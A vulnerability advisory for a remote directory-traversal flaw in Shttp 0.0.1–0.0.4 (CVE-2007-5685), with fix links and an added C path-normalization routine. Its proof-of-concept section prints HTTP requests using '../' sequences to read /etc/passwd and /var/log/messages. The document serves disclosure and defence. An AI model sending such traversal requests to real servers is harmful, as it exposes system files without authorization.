Shttp Remote Directory Traversal Vulnerability
BID:26212
Info
| Bugtraq ID: | 26212 |
| Class: | Input Validation Error |
| CVE: | CVE-2007-5685 |
| Remote: | Yes |
| Local: | No |
| Published: | Oct 25 2007 12:00AM |
| Updated: | May 07 2015 05:34PM |
| Credit: | Pete Foster is credited with the discovery of this vulnerability. |
| Vulnerable: | Vito Caputo Shttp 0.0.4; Vito Caputo Shttp 0.0.3; Vito Caputo Shttp 0.0.2; Vito Caputo Shttp 0.0.1 |
| Not Vulnerable: | Vito Caputo Shttp 0.0.5 |
Discussion
Shttp is prone to a remote directory-traversal vulnerability.
A remote attacker can exploit this issue by using directory-traversal sequences to retrieve arbitrary files on a victim user's computer.
Versions prior to Shttp 0.0.5 are vulnerable to this issue.
Exploit / POC
To exploit this issue, attackers can use readily available network utilities.
The following HTTP requests demonstrate this issue:
HEAD /../../etc/passwd HTTP/1.0

HTTP/1.1 400 Bad Request
Content-Type: text/html
Server: Shttp/ServerKit
Date: Thu, 25 Oct 2007 16:31:30 GMT
Connection: close

HEAD /../../var/log/messages HTTP/1.0

HTTP/1.1 200 OK
Content-Length: 178455
Content-Type: text/plain
Last-Modified: Thu, 25 Oct 2007 16:36:39 GMT
Server: Shttp/ServerKit
Date: Thu, 25 Oct 2007 16:42:32 GMT
Connection: close
Solution / Fix
Solution:
The vendor released Shttp 0.0.5 to address this issue. Please see the references for more information.
Vito Caputo Shttp 0.0.1
-
Vito Caputo shttp-0.0.5.tar.gz
http://serverkit.org/modules/contrib/shttp/shttp-0.0.5.tar.gz
Vito Caputo Shttp 0.0.2
-
Vito Caputo shttp-0.0.5.tar.gz
http://serverkit.org/modules/contrib/shttp/shttp-0.0.5.tar.gz
Vito Caputo Shttp 0.0.3
-
Vito Caputo shttp-0.0.5.tar.gz
http://serverkit.org/modules/contrib/shttp/shttp-0.0.5.tar.gz
Vito Caputo Shttp 0.0.4
-
Vito Caputo shttp-0.0.5.tar.gz
http://serverkit.org/modules/contrib/shttp/shttp-0.0.5.tar.gz
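A request-path check of the kind that refuses the two traversal requests quoted under Exploit / POC, given here as an added example; it is not Shttp's code and not the change made in 0.0.5. The function name `normalize_request_path` is hypothetical. It assumes the path has already been percent-decoded and it works on the text of the path only, so symbolic links under the document root need a separate check.

```c
#include <stdio.h>
#include <string.h>

/* Added example, not Shttp code. Lexically normalises an HTTP request path into
 * out (leading '/', relative to the document root). Returns 0 if ok, -1 to refuse. */
int normalize_request_path(const char *req, char *out, size_t outlen)
{
    size_t len = 0;                       /* bytes kept in out so far */
    const char *p = req;
    if (req == NULL || out == NULL || outlen < 2 || req[0] != '/')
        return -1;                        /* only absolute request paths */
    while (*p != '\0') {
        const char *seg;
        size_t n;
        while (*p == '/')                 /* collapse repeated slashes */
            p++;
        seg = p;
        while (*p != '\0' && *p != '/')
            p++;
        n = (size_t)(p - seg);
        if (n == 0 || (n == 1 && seg[0] == '.'))
            continue;                     /* empty or "." segment */
        if (n == 2 && seg[0] == '.' && seg[1] == '.') {
            if (len == 0)
                return -1;                /* ".." would climb above the root */
            while (out[--len] != '/')
                ;                         /* drop the last kept segment */
            continue;
        }
        if (len + 1 + n + 1 > outlen)
            return -1;                    /* result would not fit */
        out[len++] = '/';
        memcpy(out + len, seg, n);
        len += n;
    }
    if (len == 0)
        out[len++] = '/';                 /* request for the root itself */
    out[len] = '\0';
    return 0;
}

int main(void)
{
    /* The two request paths quoted in the advisory, plus a benign one (constructed). */
    const char *reqs[] = { "/../../etc/passwd", "/../../var/log/messages", "/docs/./a/../index.html" };
    char buf[256];
    for (size_t i = 0; i < sizeof reqs / sizeof reqs[0]; i++)
        printf("%-26s -> %s\n", reqs[i], normalize_request_path(reqs[i], buf, sizeof buf) ? "reject" : buf);
}
```

The caller appends the returned path to its document root only when the function returns 0, and answers with an error otherwise.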
References
References:
- Shttp Home Page (Vito Caputo)
- Directory traversal flaw in shttp ("digineo Advisories")